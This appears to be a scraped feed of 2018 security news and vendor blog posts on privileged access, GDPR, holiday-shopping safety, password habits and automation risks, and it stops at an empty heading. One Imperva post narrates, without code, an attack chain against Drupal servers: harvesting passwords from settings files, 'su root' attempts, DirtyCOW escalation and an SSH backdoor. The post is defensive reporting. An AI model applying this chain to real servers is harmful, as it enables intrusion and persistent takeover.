Controlling privileged access can reduce the risk of data compromise and help meet compliance obligations regarding access to sensitive data. Privileged access management (PAM) in Office 365 (Figure 4), available in the Microsoft 365 Admin Center, allows you to enforce zero standing access for your privileged administrative accounts. Zero standing access means users dont have privileges by default. When permissions are provided, its at the bare minimum with just enough access to perform the specific task. Users who need to perform a high-risk task must request permissions for access, and once received all activities are logged and auditable. Its the same principle that defines how Microsoft gives access to its datacenters and reduces the likelihood that a bad actor can gain access to your privileged accounts.

Figure 4: Privileged access management allows you to enforce zero standing access for your privileged administrative accounts.

Plan for success with Microsoft FastTrack. FastTrack comes with your subscription at no additional charge. Whether youre planning your initial rollout, needing to onboard your product, or driving user adoption, FastTrack is your benefit service that is ready to assist you. Get started with FastTrack for Microsoft 365.

Want to learn more?

For more information and guidance on this topic, check out the white paper Maintain compliance with controls and visibility that adhere to global standards. You can find additional security resources on Microsoft.com.

Coming Soon! Stay tuned for our new series: Top 10 actions you can take with Microsoft 365 Security.

More blog posts from the deploying intelligent security scenario series:

Other blog posts from the security deployment series:

The post How to help maintain security compliance appeared first on Microsoft Secure.

GDPR’s impact: The first six months

GDPR is now six months old – it’s time to take an assessment of the regulation’s impact so far. At first blush it would appear very little has changed. There are no well-publicized actions being taken against offenders. No large fines levied. So does this mean its yet another regulation that will be ignored? Actually nothing could be farther from the truth. The day GDPR came into law complaints were filed by data subjects against … More

The post GDPR’s impact: The first six months appeared first on Help Net Security.

Are we chasing the wrong zero days?

Zero days became part of mainstream security after the world found out that Stuxnet malware was used to inflict physical damage on an Iranian nuclear facility. After the revelation, organization focused efforts on closing unknown pathways into networks and to detecting unidentified cyber weapons and malware. A number of cybersecurity startups have even ridden the “zero day” wave into unicornville. Stuxnet’s ability to halt operations forced critical infrastructure operators to think about they could fall … More

The post Are we chasing the wrong zero days? appeared first on Help Net Security.

For recent big data software vulnerabilities, botnets and coin mining are just the beginning

The phrase “with great power comes great responsibility” was excellent advice when Ben Parker said it to his nephew Peter, aka Spiderman. It is even more applicable to any organization using open source software to manage their big data analysis. This is especially true since, in 2018, significant vulnerabilities were identified and disclosed for both Hadoop and Spark, allowing unauthenticated remote code execution via their REST APIs. Many enterprises have adopted big data processing components … More

The post For recent big data software vulnerabilities, botnets and coin mining are just the beginning appeared first on Help Net Security.

Internal negligence to blame for most data breaches involving personal health information

Your personal identity may fall at the mercy of attackers on many websites, but when it comes to health data breaches, hospitals, doctors offices and even insurance companies are oftentimes the culprits. Internal dangers New research from Michigan State University and Johns Hopkins University found that more than half of the recent personal health information, or PHI, data breaches were because of internal issues with medical providers – not because of hackers or external parties. … More

The post Internal negligence to blame for most data breaches involving personal health information appeared first on Help Net Security.

McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.



McAfee Blogs

8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
  2. Beware of malicious links. The most common forms of fraud and cyber attacks are phishing scams and socially-engineered malware. Check links before you click them and consider using McAfee® WebAdvisor, a free download that safeguards you from malware and phishing attempts while you surf — without impacting your browsing performance.
  3. Don’t shop on unsecured wi-fi. Most public networks don’t encrypt transmitted data, which makes all your online activity on public wi-fi vulnerable to hackers. Resist shopping on an unsecured wireless network (at a coffee shop, library, airport). Instead, do all of your online shopping from your secure home computer. If you have to conduct transactions on a public Wi-Fi connection use a virtual private network (VPN) such as McAfee® SafeConnect to maintain a secure connection in public places. To be sure your home network is safe, secure your router.
  4. Is that site legit? Before purchasing a product online, check the URL carefully. If the address bar says “HTTP” instead of “HTTPS” in its URL, do not purchase from the site. As of July 2018, unsecured sites now include a “Not Secure” warning, which is very helpful to shoppers. Also, an icon of a locked padlock will appear to the left of the URL in the address bar or the status bar down below depending on your browser. Cybercriminals can make a fake site look very close to the real thing. One added step: Google the site if anything feels wrong about it, and you may find some unlucky consumers sharing their stories.
  5. Review bills closely. Review your credit card statements in January and February, when your holiday purchases will show up. Credit cards offer better fraud protection than debit. So, if you’re shopping online during the holidays, give yourself an extra layer of protection from scams by using a credit card. Think about using the same card between family members to make checking your bill easier.
  6. Create new, strong passwords. If you are getting ready to do a lot of shopping online, it’s a great time to update your passwords. Download a free password manager, which auto-saves and enters your passwords, so you don’t have to. The True Key app protects your passwords by scrambling them with AES-256, one of the most robust encryption algorithms available.
  7. Verify charities. One of the best things about the holidays is the spirit of giving. Hackers and crooks know this and are working hard to trick innocent givers. This reality means that some seasonal charities may be well-devised scams. Before you donate, be sure to do a little research. Look at the website’s URL; it’s design, its security badges. Google the charity and see if any scams have been reported.
  8. Protect your data from third parties. Sites may contain “third parties,” which are other embedded websites your browser talks to such as advertisers, website analytics engines, that can watch your browsing behavior. To protect your data when shopping and get rid of third-party access, you need to wipe your cookies (data trackers) clean using your settings, then change your browser settings (choose “block third-party cookies and site data”) to make sure the cookies can’t track your buying behavior. You can also go into your settings and direct your browser to shop in private or incognito mode.

No one is immune to holiday scams. Many scams are intricately designed and executed so that even the savviest consumer is duped. You can enjoy the shopping that comes with the holidays by keeping these few safety precautions in mind. Don’t let your emotional desire for that perfect gift override your reasoning skills. Listen to your intuition when it comes to suspicious websites, offers, emails, pop-up ads, and apps. Pause. Analyze. And make sure you are purchasing from a legitimate site.

Stay safe and WIN: Now that you’ve read about safe shopping basics, head over to our Protect What Matters site. If you successfully complete the Holiday Online Shopping Adventure quiz, you can enter your email address for the chance to win a tech prize pack with some of this season’s hottest smart gadgets. Have fun, and stay safe online this holiday season!

 

The post 8 Ways to Secure Your Family’s Online Holiday Shopping appeared first on McAfee Blogs.

MacOS Penetration Test Reveals Three Zero-Day Vulnerabilities

Recently, DropBox undertook a Pen Test to highlight potential vulnerabilities with Mac OS. Syndis, a Cyber Security firm was engaged

MacOS Penetration Test Reveals Three Zero-Day Vulnerabilities on Latest Hacking News.

WeLiveSecurity: Good deal hunting: Staying safe on Black Friday

As the unofficial beginning of the holiday shopping season catches us up in the frenetic hunt for all those fantastic bargains, the shopping bonanza presents a host of risks to your online safety. Here are a few tips for going on a shopping spree and staying safe

The post Good deal hunting: Staying safe on Black Friday appeared first on WeLiveSecurity



WeLiveSecurity

Don’t accept risk with a pocket veto

We who live risk management know there are four responses when confronted with a credible risk to our organizations. We can treat the risk to reduce it. We can avoid the risk by altering our organization’s behavior. We can transfer the risk with insurance or outsourcing, though the transfer is rarely complete. Lastly, we can accept risk and hope for the best. Let’s get this out of the way first: no security professional wants to … More

The post Don’t accept risk with a pocket veto appeared first on Help Net Security.

Losses from online payment fraud to reach $48 billion annually

A new study from Juniper Research has found that annual online payment fraud losses from eCommerce, airline ticketing, money transfer and banking services, will reach $48 billion by 2023; up from the $22 billion in losses projected for 2018. Juniper’s new research, Online Payment Fraud: Emerging Threats, Segment Analysis & Market Forecasts 2018-2023, claimed that a critical driver behind these losses will be the continued high level of data breaches resulting in the theft of … More

The post Losses from online payment fraud to reach $48 billion annually appeared first on Help Net Security.

Vision Direct Deals With Customer Data Leak

Vision Direct, UK’s biggest online retailer involved in the business of supplying contact lens has recently hit the headlines for

Vision Direct Deals With Customer Data Leak on Latest Hacking News.

UK Infrastructure Allocates £1.9 Billion For Cyber Security Boost

Members of Parliament at the UK have recently pointed out the country’s lack of leadership in the cybersecurity domain. Unfortunately,

UK Infrastructure Allocates £1.9 Billion For Cyber Security Boost on Latest Hacking News.

Facebook, Instagram, and WhatsApp Suffer a Major Outage

Days before Thanksgiving, three of the most popular social networking tools in the United States suffered a major outage. The blackout began being noticeable on Tuesday morning as hundreds of users reported that they are unable to access Facebook and Instagram. Many users shared that they are experiencing difficulties with other Facebook-owned apps such as the instant messaging service WhatsApp. The hashtag #FacebookDown immediately became a trending topic on the rival social network Twitter. Most of the affected users received the following error messages when they tried to access some of the Facebook services: “service unavailable” and “sorry, something went wrong. We’re working on it, and we’ll get it fixed as soon as we can.”

Almost immediately, Facebook acknowledged the issue through the company’s Twitter profile. A tweet sent from Facebook’s official Twitter account said that they are aware that there are some people experiencing difficulties accessing the Facebook family of apps. Facebook confirmed that they are working to resolve the issue as soon as possible. Mark Zuckerberg’s communications team gave the same statement to ABC News a few hours after the outage was acknowledged on Twitter confirming the issue hasn’t been resolved yet. It is currently unknown if hackers are behind the outage, or it is an internal issue.

Who was affected by the Facebook outage?

The outage affected users living on the East Coast of the United States as well as people residing in the United Kingdom, Germany, Italy, Bulgaria, Portugal and the majority of Eastern Europe. South America’s Brazil, Argentina, Venezuela, and Colombia were also affected by the outage.

What caused the Facebook outage?

Facebook has not yet identified the source of the problem. Currently, no evidence confirms the outage is a result of a data breach or a cyber-attack.

How many people were affected?

There isn’t an official number of people who have been affected. However, Facebook apps are used by billions of people from all over the world, and even small glitches could impact hundreds of millions of people.

Facebook is going through tough times, and this is starting to be noticeable on the stock market – Facebook stock is continuing to dip. The outage won’t help Facebook get out of its track to post a three-month losing streak. This outage is also the company’s second for this month. According to Mark Zuckerberg’s communications team, the blackout that happened a couple of weeks ago was a result of a routine test that went bad. Facebook is currently unable to confirm if the incidents are related.

If you are reading this article and you are still unable to access Facebook or Instagram, it is very likely that Facebook is still investigating the issue and working on a resolution. You can see the status of this issue on Facebook for Developers here.

Download your Antivirus

The post Facebook, Instagram, and WhatsApp Suffer a Major Outage appeared first on Panda Security Mediacenter.

Conficker: A 10-year retrospective on a legendary worm

This November marked the 10-year anniversary of Conficker, a fast-spreading worm targeting Microsoft systems that went on to claim one of the highest levels of infection in history. Millions of computers were eventually infected by the worm, including hospitals across Europe as well as ordinary consumers. Looking back to my time helping to defeat the worm however, it is apparent that the outbreak also helped to elevate the security industry and shape many of the … More

The post Conficker: A 10-year retrospective on a legendary worm appeared first on Help Net Security.

The holiday season and cybercrime: 8 ways to protect yourself

The holiday season has become an unbridled online spending extravaganza, and threat actors have taken notice. For shoppers, what starts out as an attempt to fulfill their holiday shopping checklist for pennies on the dollar can turn into a financial nightmare. For brands, what begins as an event that significantly boosts sales can turn into a security fiasco that erodes the trust between them and their customers and prospects. Cyber Monday 2017 was the largest … More

The post The holiday season and cybercrime: 8 ways to protect yourself appeared first on Help Net Security.

Should government officials complete basic cyber security training?

Venafi announced the results of a survey of 515 IT security professionals’ views on the cyber security literacy of government officials. The survey was conducted August 4-9, 2018, at the Black Hat conference in Las Vegas. According to the survey, eighty-eight percent of respondents believe all government officials should be required to complete a basic cyber security training course. In addition, sixty-six percent believe governments should not be able to force technology companies to grant … More

The post Should government officials complete basic cyber security training? appeared first on Help Net Security.

The state of BYOD and mobile device security

Bitglass has released its 2018 BYOD Security Report. The analysis is based on a survey of nearly 400 enterprise IT experts who revealed the state of BYOD and mobile device security in their organizations. According to the study, 85 percent of organizations are embracing BYOD. Interestingly, many organizations are even allowing contractors, partners, customers, and suppliers to access corporate data on their personal devices. Amidst this BYOD frenzy, over half of the survey’s respondents believe … More

The post The state of BYOD and mobile device security appeared first on Help Net Security.

Privacy laws do not understand human error

In a world of increasingly punitive regulations like GDPR, the combination of unstructured data and human error represents one of the greatest risks an organization faces. Understanding the differences between unstructured and structured data – and the different approaches needed to secure it – is critical to achieve compliance with the many data privacy regulations that businesses in the U.S. now face. Structured data is comprised of individual elements of information organized to be accessible, … More

The post Privacy laws do not understand human error appeared first on Help Net Security.

66.1% of vulnerabilities published through Q3 2018 have a documented solution

There have been 16,172 vulnerabilities disclosed through October 29th, which is a 7% decrease from the high record reported last year at this time. The 16,172 vulnerabilities cataloged through Q3 2018 by Risk Based Security’s research team eclipsed the total covered by the CVE and National Vulnerability Database (NVD) by over 4,800. It’s also worth noting that NVD is still significantly behind in vulnerability scoring and creating the automation component. Vulnerabilities with a CVSSv2 score … More

The post 66.1% of vulnerabilities published through Q3 2018 have a documented solution appeared first on Help Net Security.

Only 14% have complete organizational awareness of IoT threats

86 percent of IT and security decision makers across the globe believe their organization needs to improve its awareness of IoT threats, according to Trend Micro. This significant lack of knowledge accompanies rising threat levels and security challenges related to connected devices, which leaves organizations at great risk. The poll of 1,150 IT and security leaders1 reveals a worrying lack of cybersecurity maturity in many organizations around the world as they deploy IoT projects to … More

The post Only 14% have complete organizational awareness of IoT threats appeared first on Help Net Security.

DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers

In this post we’ll unpack a short — but no less serious — attack that affected some Linux-based systems, on October 31. Throughout the campaign, the attacker used a chain of vulnerabilities including the infamous Drupalgeddon2 and DirtyCOW, and system misconfigurations to persistently infect vulnerable Drupal web servers and take over user machines.

In the past, remote code execution (RCE) attacks on web servers were usually once-off security events – attackers would run their malicious code, and that was it. If the process was detected and terminated, or if the administrator restarted the web servers, the attack would stop.

Increasingly, attackers are opting for persistent attacks. Persistency means that the attacker has a technique to easily re-infect a vulnerable server in case the process is terminated or after a server restart, or run an additional malicious code. Persistency is achieved through different techniques and usually depends on the type of operating system.

Exploiting SSH in Linux

In the case of Linux-based systems, one of the favorite techniques used by attackers is opening a communication channel through SSH and transmitting malicious commands. This technique assumes that an SSH service is installed in the target system. But what happens if it isn’t? Well, then the attacker would somehow need to install it themselves.

In our case, the attack surface was the web application. This means that the attacker’s code was running under the user and permissions of the web application. Usually, the web server user (e.g. nobody, www-data etc.) has minimal permissions and can’t install new services. What if the attacker could change its user context and get sufficient permissions? What if the attacker changed the user to ‘root’? This will certainly help…

First, the attacker builds a word list by locating all of Drupal’s settings files and extracting any line with the word “pass” in it.

This technique can be quite useful as many administrators leave ‘root’ as the default user to connect from the web application to the database.

Then, armed with a potential list of passwords, the attacker tries to use the operating system command ‘su root’ to change the user to root.

If the attacker succeeds in changing the user, they can proceed to download the secondary payload ‘sshdstuff’ and execute (more details below).

If the administrator was careful and didn’t leave root passwords in the configuration files, this technique fails, and the attacker tries to exploit the DirtyCOW bug to escalate their privileges to root. The attacker downloads three different implementations of DirtyCOW and runs them one after the other. One of the implementations is downloaded in its raw format (C source code file) and is compiled at runtime. Surprisingly, one of the implementations of this two-year-old bug has zero detection rate in VirusTotal.

Finally, when the attacker switches to the root user and has permissions to install new services, they install SSH, configure it and add their key to the list of authorized keys by the service. Now, as long as the machine is up and running, the attacker can remotely transmit any command as the user root – game over.

Mitigation suggestions

Administrators should make sure that their web application is fully patched as well as the operating system of the host. Alternately, it is possible to use external cybersecurity solution, like a WAF, to block the attack before it reaches the server. Imperva customers are protected out of the box.

The post DirtyCOW Bug Drives Attackers to A Backdoor in Vulnerable Drupal Web Servers appeared first on Blog.

Cybersecurity Is Getting Its Own Agency

Without any notable opposition to the Senate’s version of the bill, the House agreed to a reorganization of the Cybersecurity and Infrastructure Security Agency (CISA) Act earlier this week, according

The post Cybersecurity Is Getting Its Own Agency appeared first on The Cyber Security Place.

Major SMS Leak Exposed Millions Of Messages

Two-factor authentication codes were also exposed in Voxox leak. A huge database with user names, smartphone numbers, SMS messages and even two-factor authentication codes has been exposed, putting personal details at

The post Major SMS Leak Exposed Millions Of Messages appeared first on The Cyber Security Place.

BYOD Posing Major Mobile Security Risks

More and more organisations are allowing employees to bring their own devices for work. More than four in five organisations allow their employees to bring their own devices (BYOD) to

The post BYOD Posing Major Mobile Security Risks appeared first on The Cyber Security Place.

Review: Specops Password Policy

All who work in the information security industry agree that passwords are one of the worst security nightmares of the modern information security age. Having weak passwords – even as part of a multi-factor authentication scheme – degrades the security posture of an organization. Unfortunately, as passwords scale well, they are still present in practically every organization and even central authentication places like Active Directory. There are multiple security controls, even in core operating systems, … More

The post Review: Specops Password Policy appeared first on Help Net Security.

Remote working may boost productivity, but also leave you vulnerable to attack

New flexible working practices could pose a security risk to small businesses, with one in five of employees (21%) stating they are most productive when working in public spaces like a cafe or library, but only 18% concerned with the security implications this could have. SMBs therefore face the challenge of keeping their business secure, all the while adhering to the needs and expectations of the modern workforce, according to Avast. Concerns small business staff … More

The post Remote working may boost productivity, but also leave you vulnerable to attack appeared first on Help Net Security.

In a post-EMV world, fraud is shifting from in-person to ecommerce channels

Three years after the switch to new chip-based credit and debit cards, a study by the National Retail Federation and Forrester says payment card fraud is still a top concern for large U.S. retailers as criminals move their activities online. “The implementation of EMV chip cards and chip card readers was supposed to dramatically reduce credit and debit card fraud,” the State of Retail Payments report said. “So why is fraud still the top concern … More

The post In a post-EMV world, fraud is shifting from in-person to ecommerce channels appeared first on Help Net Security.

Cybersecurity Is (Still) Everyone’s Job

As noted previously—and as we all know—an organization cannot be secure until the entire workforce is engaged in reducing cyber risks. Each member of the group has the power to harm or to help, since each one has access to information systems, handles sensitive data and makes decisions every day which maintain, erode or strengthen […]… Read More

The post Cybersecurity Is (Still) Everyone’s Job appeared first on The State of Security.

Japanese government’s cybersecurity strategy chief has never used a computer

The Japanese government’s cybersecurity strategy chief Yoshitaka Sakurada is in the middle of a heated debate due to his admission about his cyber capability.

Yoshitaka Sakurada admitting he has never used a computer in his professional life, despite the Japanese Government, assigned to the politician the responsibility for cybersecurity of the 2020 Tokyo Olympics.

Sakurada was only appointed as cyber minister in October after Japanese Prime Minister Shinzo Abe was re-elected as head of the Liberal Democratic Party.

When the independent lawmaker Masato Imai in a lower house session questioned Sakurada about its cyber capabilities, the Japanese politician confirmed that he never user a computer since he was 25 years old.

“Since I was 25 years old and independent I have instructed my staff and secretaries. I have never used a computer.”  said Yoshitaka Sakurada.

Of course, the response shocked the audience, including Imai.

“I find it unbelievable that someone who is responsible for cybersecurity measures has never used a computer.” said Imai.

“It’s a matter that should be dealt with by the government as a whole. I am confident that I am not at fault.” replied Sakurada. 

This isn’t the first time Sakurada was in the middle of a controversy, in 2016 he was admonished for saying that women forced into wartime Japanese military brothels were “prostitutes by occupation.”

At the time, South Korean Government rebuked the Japanese Government and Sakurada was obliged to retract the remarks. Into wartime, many Koreans women were forced into sexual slavery by Japan’s Imperial Army.

Pierluigi Paganini

(Security Affairs – Japanese cybersecurity strategy chief, politics)

The post Japanese government’s cybersecurity strategy chief has never used a computer appeared first on Security Affairs.

What Your Password Says About You

At the end of last year, a survey revealed that the most popular password was still “123456,” followed by “password.” These highly hackable choices are despite years of education around the importance of password security. So, what does this say about people who pick simple passwords? Most likely, they are shooting for a password that is easy to remember rather than super secure.

The urge to pick simple passwords is understandable given the large number of passwords that are required in our modern lives—for banking, social media, and online services, to simply unlocking our phones. But choosing weak passwords can be a major mistake, opening you up to theft and identity fraud.

Even if you choose complicated passwords, the recent rash of corporate data breaches means you could be at even greater risk by repeating passwords across accounts. When you repeat passwords all a hacker needs to do is breach one service provider to obtain a password that can unlock a string of accounts, including your online banking services. These accounts often include identity information, leaving you open to impersonation. The bad guys could open up fraudulent accounts in your name, for example, or even collect your health benefits.

So, now that you know the risks of weak password security, let’s see what your password says about you. Take this quiz to find out, and don’t forget to review our password safety tips below!

Password Quiz – Answer “Yes” or “No”

  1. Your passwords don’t include your address, birthdate, anniversary, or pet’s name.
  2. You don’t repeat passwords.
  3. Your passwords are at least 8 characters long and include numbers, upper and lower case letters, and characters.
  4. You change default passwords on devices to something hard to guess.
  5. You routinely lock your phone and devices with a passcode or fingerprint.
  6. You don’t share your passwords with people you’re dating or friends.
  7. You use a password manager.
  8. If you write your passwords down, you keep them hidden in a safe place, where no one else can find them.
  9. You get creative with answers to security questions to make them harder to guess. For example, instead of naming the city where you grew up, you name your favorite city, so someone who simply reads your social media profile cannot guess the answer.
  10. You make sure no one is watching when you type in your passwords.
  11. You try to make your passwords memorable by including phrases that have meaning to you.
  12. You use multi-factor authentication.

Now, give yourself 1 point for each question you answered “yes” to, and 0 points for each question you answered “no” to. Add them up to see what your password says about you.

9-12 points:

You’re a Password Pro!

You take password security seriously and know the importance of using unique, complicated passwords for each account. Want to up your password game? Use multi-factor authentication, if you don’t already. This is when you use more than one method to authenticate your identity before logging in to an account, such as typing in a password, as well as a code that is sent to your phone via text message.

4-8 points

You’re a Passable Passworder

You go through the basics, but when it comes to making your accounts as secure as they can be you sometimes skip important steps. Instead of creating complicated passwords yourself—and struggling to remember them—you may want to use a password manager, and let it do the work for you. Soon, you’ll be a pro!

1-3 points

You’re a Hacker’s Helper

Uh oh! It looks like you’re not taking password security seriously enough to ensure that your accounts and data stay safe. Start by reading through the tips below. It’s never too late to upgrade your passwords, so set aside a little time to boost your security.

Key Tips to Become a Password Pro:

  • Always choose unique, complicated passwords—Try to make sure they are at least 8 characters long and include a combination of numbers, letters, and characters. Don’t repeat passwords for critical accounts, like financial and health services, and keep them to yourself.Also, consider using a password manager to help create and store unique passwords for you. This way you don’t have to write passwords down or memorize them. Password managers are sometimes offered as part of security software.
  • Make your password memorable—We know that people continue to choose simple passwords because they are easier to remember, but there are tricks to creating complicated and memorable passwords. For instance, you can string random words together that mean something to you, and intersperse them with numbers and characters. Or, you can choose random letters that comprise a pattern only know to you, such as the fist letter in each word of a sentence in your favorite book.
  • Use comprehensive security software—Remember, a strong password is just the first line of defense. Back it up with robust security softwarethat can detect and stop known threats, help you browse safely, and protect you from identity theft.

For more great password tips, go here.

Looking for more mobile security tips and trends? Be sure to follow @McAfee Homeon Twitter, and like us on Facebook.

The post What Your Password Says About You appeared first on McAfee Blogs.

With The NASDAQ Bell Ceremony, We Kick Off The Next Leg of Imperva’s Incredible Journey

On Friday morning our CEO Chris Hylen and company execs rung the NASDAQ opening bell in New York, welcoming another day of trading for the world’s second-largest stock exchange; and taking full advantage of the opportunity to celebrate recent corporate milestones for Imperva.

 

“I’m honored to be standing here today, alongside our management team, representing our amazing employees around the globe.  I’d like to thank each of my Imperva colleagues for their dedication to our customers, passion for innovation, and commitment to protecting data and applications,” said Hylen.

Market Bell Ceremonies at the Nasdaq Market Site in New York’s Times Square don’t come along every day, and for us, the event hits even closer to home. As a member of NASDAQ for the last five years, Imperva also happens to protect the stock exchange’s websites, applications, APIs and databases from cyber attacks.

“For enterprises, data is vital and applications are how they run the business – it’s essential that businesses protect both of these critical assets from cybercriminals.”

What better place than our home since 2016 then, to usher in the new Imperva with a sneak peek at our new logo; which represents what we’ll look and feel like to our fellow employees, customers, partners,  and prospects. We’re putting the world on notice that the new Imperva is coming – aligned with our strategy, our credo, and our mission.

“We pride ourselves in the role we play in delivering simple, effective, and enduring protection for our customers.  We innovate using data, analytics, best of breed software and our community’s expertise.”

The post With The NASDAQ Bell Ceremony, We Kick Off The Next Leg of Imperva’s Incredible Journey appeared first on Blog.

6 security concerns to consider when automating your business

Automation is an increasingly-enticing option for businesses, especially when those in operations are in a  perpetual cycle of “too much to do and not enough time to do it.”

When considering an automation strategy, business representatives must be aware of any security risks involved. Here are six concerns network admins and other IT staff should keep in mind.

1. Using automation for cybersecurity in counterproductive ways

The cybersecurity teams at many organizations are overextended, accustomed to taking on so many responsibilities that their overall productivity goes down. Automating some cybersecurity tasks could provide much-needed relief for those team members, as long as those employees use automation strategically.

For example, if cybersecurity team members automate standard operating procedures, they’ll have more time to triage issues and investigate potential vulnerabilities. But, the focus must be on using automation in a way that makes sense for cybersecurity—as well as the other parts of the business. Human intelligence is still needed alongside automation in order to better identify threats, analyze patterns, and quickly make use of available resources. If you build up defenses but leave them unattended, eventually the enemies are going to break through.

2. Giving too many people access to automatic payment services

Forgetting to pay a bill on time is embarrassing and can negatively affect a company’s access to lines of credit. Fortunately, companies can use numerous automatic bill-paying services to deduct the necessary amounts each month, often on a specified day.

Taking that approach prevents business representatives from regularly having to pull credit cards out of their wallets and manually type the numbers into forms. However, it’s a best practice to restrict the number of people who can set up those payments and verify that they happen.

Otherwise, if there are problems with a payment, it’ll become too difficult to investigate what went wrong. In addition, there’s a possibility of insider threats, such as a disgruntled employee or someone looking to get revenge after termination. Malicious insiders could access a payment service and change payment schedules, delete payment methods, withdraw large amounts, or otherwise wreak havoc.

3. Thinking that automation is infallible

One of the especially handy things about automation is that it can reduce the number of errors people make. Statistics indicate that almost 71 percent of workers report being disengaged at the office. Repetitive tasks are often to blame, and automation could reduce the boredom people feel (and mistakes they make) by relegating them to more challenging projects.

Regardless of the ways they use automation, IT admins mustn’t fall into the habit of believing that automated tools are foolproof, and it’s not necessary to check for mistakes. For example, if a company uses automation to deal with financial-related content, such as invoices, it should not adopt a relaxed approach to keeping that information secure just because a tool is now handling the task.

In all responsibilities that involve keeping data secure, humans still play a vital role in ensuring things are working as they should. After all, people are the ones who set up the processes that automation carries out, and those people could have made mistakes, too.

4. Failing to account for GDPR

The General Data Protection Regulation (GDPR) went into effect in May 2018, and it determines how businesses must treat the data of customers in the European Union. Being in violation could result in substantial fines for businesses, yet some companies aren’t even aware they’re doing something wrong.

Keeping information in a customer relationship management (CRM) database could maintain GDPR compliance by helping businesses have accurate and up-to-date records of their customers, making it easier to ensure they treat that information appropriately. As the GDPR gives customers numerous rights, including the right to have data erased or the right to have the data stored but not processed, any automation tools selected by an organization need to be agile enough to accommodate those requests.

Automation—whether achieved through a CRM tool or otherwise—can actually help companies better align with GDPR regulations. In fact, it’s essential that companies not overlook GDPR when they choose ways to automate processes.

5. Not using best practices with password managers

Password managers are incredibly convenient and secure because they store, encrypt, and automatically fill in the proper passwords for any number of respective accounts—as long as users know the correct master password. Some of them even automate filling in billing details by storing payment information in secure online wallets.

However, there are wrong ways to use password managers for business or personal purposes. For example, if a person chooses a master password that she’s already used on multiple other sites or shares that password with others, she’s defeated the purpose of the password manager. Choosing a password manager with multi-factor authentication is our recommendation for the most secure way to log into your accounts.

It’s undoubtedly convenient to visit a site and have it automatically fill in your password for you with one click. But, password managers only work as intended when employees use them correctly.

6. Ignoring notifications to update automation software

